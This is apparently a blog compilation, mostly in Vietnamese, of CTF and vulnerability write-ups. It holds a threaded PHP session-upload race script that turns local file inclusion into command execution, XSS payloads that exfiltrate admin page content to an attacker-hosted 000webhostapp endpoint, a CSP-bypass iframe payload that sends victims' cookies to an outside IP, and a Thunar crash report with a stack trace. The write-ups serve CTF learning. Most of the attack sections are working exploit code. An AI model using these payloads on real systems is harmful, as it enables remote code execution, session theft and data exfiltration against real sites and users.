Race Condition + LFI -> RCE (Orange is my idol)

import sys
import string
import requests
from base64 import b64encode
from random import sample, randint
from multiprocessing.dummy import Pool as ThreadPool

host = 'http://192.168.99.113/test.php?0='
sess_name = 'ahihiphp'
cmd = "ls -la"
sig = "ahihidkm"

headers = {
'Connection': 'close',
'Cookie': 'PHPSESSID=' + sess_name
}

payload = '<?php echo "'+sig+'";system("'+cmd+'");?>'

def runner(i):
data = {
'PHP_SESSION_UPLOAD_PROGRESS': 'ZZ' + payload + 'Z'
}
while 1:
fp = open('cc', 'rb')
r = requests.post(host+"/var/lib/php/sessions/sess_"+sess_name, files={'f': fp}, data=data, headers=headers)
if "ahihidkm" in r.text:
print r.text
fp.close()

pool = ThreadPool(32)
result = pool.map_async( runner, range(32) ).get(0xffff)

payload:

POST /test.php?0=/var/lib/php/sessions/sess_ahihiphp HTTP/1.1
Host: 192.168.99.113
Connection: close
Accept: */*
User-Agent: python-requests/2.18.1
Cookie: PHPSESSID=ahihiphp
Content-Length: 292
Content-Type: multipart/form-data; boundary=736656504112497486ae1e02ec4e3f6b

--736656504112497486ae1e02ec4e3f6b
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

ZZ<?php echo "ahihidkm";system("ls -la");?>Z
--736656504112497486ae1e02ec4e3f6b
Content-Disposition: form-data; name="f"; filename="cc"

ajnj

--736656504112497486ae1e02ec4e3f6b--

Hacklu 2018 – IDeaShare (CSP nonce)

Author(s): kunte_ Solves: 2
Difficulty: hard
A place to share your IDeas with your friends!
Try to win the best IDea competition but be wary a strong force prevents any cheating.
Good luck you will need it!
link: https://arcade.fluxfingers.net:1818/

Bài này thực ra không khó nhưng chỉ có 2 team giải ra, lý do có thể là do:
– Cấu hình tường lửa, IDS, IPS gì đó làm rối người chơi
– Blackbox, tất cả clue hầu như đều là guessing và testing mới có thể kiếm được
– Làm rối bằng cách chèn những tính năng khó hiểu
Mình đã không giải ra bài này trong thời gian diễn ra contest vì mình nghĩ là nó rất khó hoặc vì mình ham Liên Quân hơn.
Cho tới bây giờ mình vẫn không thấy ai write up trên kênh CTFtime, vì vậy mình quyết định viết để những người làm bài này bớt ức chế
Bước 1: Guessing và testing mình thấy một số thứ
– Chức năng reset password không hoạt động, và sau này cũng chả có ích gì cho việc khai thác (Mình tự hỏi tác giả muốn gì)
https://arcade.fluxfingers.net:1818/?page=admin
– Tất cả param đều được đưa qua tường lửa, IDS, IPS hay gì đó.
– Chức năng share IDeas nhưng tới cuối mình mới hiểu đây là con bot check XSS.
– Nếu con bot check đoạn XSS hoạt động thành công thì nó sẽ hiện ra như vậy

– Không hề có santizer khi xem raw IDea, tuy nhiên WAF khá gắc.
Bước 2: Bypass IDS, IPS
– Sau khi test với 1 số special payload XSS, tự nhiên lọt 1 payload có thể bypass:

Nhưng phải thỏa một số điều kiện, cụ thể như sau:
+ CORS accept từ attacker host -> iz, ok_hand -> header(“Access-Control-Allow-Origin: *”);
+ Domain name cần phải ngắn gọn xúc tích, và tuyệt đối không chứa những từ nhạy cảm: script, on[xxx], 0x, svg … -> không khó lắm
+ Mua Cert, Cấu hình server attacker chạy trên https -> giàu có, gắc
Điều kiện thứ 3 hơi khó nhưng không phải là không thể, mình dùng cái này 000webhostapp.com
Bước 3: Exploit
Scenario 1: Có admin (chắc bot=admin)-> reset password -> chức năng này không hoạt động -> bỏ qua
Scenario 2: Lấy cookie bot -> session hijacking -> không có cookie
Scenario 3: Blind đọc source admin
Tạo 1 endpoint đọc source admin rồi gửi cho mình

<link/rel=import href=https://aaaaacax.000webhostapp.com/hacklu/leak.php>

nội dung

<?php
header("Access-Control-Allow-Origin: *");
?>
<script>
		function postXMLDoc(theURL,ct)
		 {
		     if (window.XMLHttpRequest)
		     {// code for IE7+, Firefox, Chrome, Opera, Safari, SeaMonkey
		         xmlhttp=new XMLHttpRequest();
		     }
		     else
		     {// code for IE6, IE5
		         xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
		     }
		     xmlhttp.onreadystatechange=function()
		     {
		         
		             a = xmlhttp.responseText;
		         
		     }
		     xmlhttp.open("POST", theURL, false);
		    xmlhttp.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
		     xmlhttp.send('a='+btoa(ct));
		 }
		
		function loadXMLDoc(theURL)
		 {
		     if (window.XMLHttpRequest)
		     {// code for IE7+, Firefox, Chrome, Opera, Safari, SeaMonkey
		         xmlhttp=new XMLHttpRequest();
		     }
		     else
		     {// code for IE6, IE5
		         xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
		     }
		     xmlhttp.onreadystatechange=function()
		     {
		         
		             a = "pl="+xmlhttp.responseText;
		         
		     }
		     xmlhttp.open("GET", theURL, false);
		     xmlhttp.send();
		 }
		loadXMLDoc('/index.php?page=admin');
		postXMLDoc('https://aaaaacax.000webhostapp.com/', a);
	</script>
</script>
<script>alert(33)</script>

Share idea với admin, tìm thấy đoạn code khả nghi

OK mọi chuyện đã rõ, win competition để lấy flag
Tạo 1 endpoint để buộc admin cho mình win

<link/rel=import href=https://aaaaacax.000webhostapp.com/hacklu/leak.php>

Nội dung

<?php
header("Access-Control-Allow-Origin: *");
?>
<script>
var cc = new XMLHttpRequest();
cc.onreadystatechange = function() {
    if (this) {
        var xhttp = new XMLHttpRequest();
        xhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
            }
        };
        xhttp.open("POST", "https://aaaaacax.000webhostapp.com/?cax="+this.status, true);
        xhttp.send(this.responseText);
    }
};
cc.open("POST", "/?page=admin", true);
cc.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
cc.send("userid=10&submit=1");
</script>

https://arcade.fluxfingers.net:1818/?page=competition lấy flag hoy

CVE-2018-18398

Description: Xfce Thunar 1.6.15, when Xfce 4.12 is used, mishandles the IBus-Unikey input method for file searches within File Manager, leading to an out-of-bounds read and SEGV. This could potentially be exploited by an arbitrary local user who creates files in /tmp before the victim uses this input method.
Additional Information:
VirtualBox POC: https://drive.google.com/open?id=1MMjgybKioy2evO8ywzderTT60MwjA11Z
Core Dump: https://drive.google.com/open?id=1Vz3rezkQiOf_b-q6x3RZ7C4nSkje9GhU
Stack trace:

> gdb-peda$ run
> Starting program: /tmp/thunar 
> 
> Thread debugging using libthread_db enabled
> 
> Using host libthread_db library "/usr/lib/libthread_db.so.1".
> [New Thread 0x7fffed6c9700 (LWP 3439)]
> [New Thread 0x7fffecec8700 (LWP 3440)]
> [New Thread 0x7fffe7b8f700 (LWP 3441)]
> [New Thread 0x7fffe738e700 (LWP 3442)]
> 
> (thunar:3438): Gdk-WARNING **: gdk_window_set_icon_list: icons too large
> 
> Thread 0x7fffe738e700 (LWP 3442) exited
> 
> Thread 1 "thunar" received signal SIGSEGV, Segmentation fault.
> 
> RAX: 0x7400000061 ('a')
> RBX: 0x0 
> RCX: 0x7fffffffce90 --> 0x5555558a41e0 --> 0x4 
> RDX: 0x555555892490 --> 0x55555589b9a0 --> 0x55555589b800 --> 0x2 
> RSI: 0x555555aebbf0 --> 0x555555aa0061 --> 0x0 
> RDI: 0x5555559d13f0 --> 0x5555558a2740 --> 0x5555558a41e0 --> 0x4 
> RBP: 0x555555aa19f0 --> 0x40000002 
> RSP: 0x7fffffffccc8 --> 0x7ffff4e06c5d (<g_closure_invoke+413>:    mov    rax,QWORD PTR [rbp+0x0])
> RIP: 0x7ffff79a1fb4 (mov    edi,DWORD PTR [rax+0x154])
> R8 : 0x7fffffffce10 --> 0x135 
> R9 : 0x0 
> R10: 0x555555804758 --> 0x700070 ('p')
> R11: 0x7fffffffd060 --> 0x3000000020 (' ')
> R12: 0x2 
> R13: 0x7fffffffce90 --> 0x5555558a41e0 --> 0x4 
> R14: 0x7fffffffce10 --> 0x135 
> R15: 0x7ffff6a32770 (<g_cclosure_marshal_VOID__STRING>:    cmp    edx,0x2)
> EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
> 
>    0x7ffff79a1fa1:    call   QWORD PTR [rip+0x229919]        # 0x7ffff7bcb8c0
>    0x7ffff79a1fa7:    nop    WORD PTR [rax+rax*1+0x0]
>    0x7ffff79a1fb0:    mov    rax,QWORD PTR [rsi+0x70]
> => 0x7ffff79a1fb4:    mov    edi,DWORD PTR [rax+0x154]
>    0x7ffff79a1fba:    or     BYTE PTR [rax+0x148],0x2
>    0x7ffff79a1fc

VulnerabilityType
Out of Bound
Vendor of Product
XFCE
Affected Product Code Base
Thunar – < 1.6.15 and Xfce < 4.12
Reference
Exploit:

Discoverer
0xd0ff9

MATESCTF 3 ROUND 1 (WEB 3)

Mình đã từng chơi matesctf qua nhiều mùa giải và trong số những bài mình giải được thì mình cảm thấy bài này là bài hay nhất, tuy nhiên hay với cách là unintend mà mình mới học được.
Nói qua một chút về cách mà tác giả muốn

Intent Solution:
Thực ra tác giả ra bài này nó tiết lộ cách giải bài này qua một bình luận trên facebook của mình khi mình đăng write up bài “Song Kiếm” của giải ISITDTU CTF Final 2018. Ý tưởng là dùng CSP để chặn con bot không leak được cookie ra ngoài mà chỉ dùng con bot đẩy cookie vào bảng flag bằng một lỗi sql injection (à quên, đó là một tính năng), sau đó dùng một lỗi sql injection để lấy flag ra. Mình sẽ không write up cách này vì mình đoán sẽ có người viết sau [:D]

nhá hàng phát.

Unintent Solution:
Trong quá khứ, mình đã từng có một thời bị bắt phải viết Content Security Policy, cũng bị chửi nhiều, nhiều lần bị thọt tính sẵn sàng, nhiều lần bị thọt về tính bảo mật [:'(], nên cũng có chút kinh nghiệm với cái này.

Nhìn thì có vẻ khá an toàn nhỉ, có vẻ là chắc bot sẽ không thể đem cookie đi qua được đường này được.
Tuy nhiên

Trong một khía cạnh khác, Content Security Policy lại không được cài đặt, điều này có nghĩa không phải là không thể đưa dữ liệu từ bot ra ngoài được. Nếu mình đoán không nhầm thì cookie sẽ được đặt ở domain 125.235.240.166 hoặc cùng lắm là ở 125.235.240.166/web3/.
Tới đây mình sẽ hướng đến 1 vector để cho con bot sẽ phải đi qua lộ trình như sau:
Điểm thứ 1: 125.235.240.166/web3/ -> CSP
Điểm thứ 2: 125.235.240.166/web3/background.png -> Không có CSP
Điểm thứ 3: server của mình

Cách dễ nhất để tạo cầu nối là dùng iframe:
Bước 1: Mình sẽ tạo một iframe với src=”/web3/background.jpg”, lúc này khi browser check CSP sẽ OK.
Bước 2: Ở ngoài sẽ có CSP, tuy nhiên bên trong iframe sẽ không có CSP vì URL lúc này đang là 125.235.240.166/web3/background.png , do đó mình sẽ tạo một tag img với đường link về server mình kèm với cookie ở trong iframe tạo ở bước 1 và không có rào cản nào [:D].
Bước 3: Xây dựng payload
http://125.235.240.166/web3/?feature=comments&comment=%3Cscript%3Ef=document.createElement(%22iframe%22);f.id=%22bechanh%22;f.src=%22/web3/background.jpg%22;f.onload=()=%3E{x=document.createElement(%27img%27);x.src=%27//35.231.54.0:13337/%27%2bdocument.cookie;bechanh.contentWindow.document.body.appendChild(x)};document.body.appendChild(f);%3C/script%3E
Nguyên văn:

f=document.createElement("iframe");f.id="bechanh";f.src="/web3/background.jpg";f.onload=()=>{x=document.createElement('img');x.src='//35.231.54.0:13337/'+document.cookie;bechanh.contentWindow.document.body.appendChild(x)};document.body.appendChild(f);

Thử tự lấy cookie của mình

Xong rồi giờ mình gửi cho bot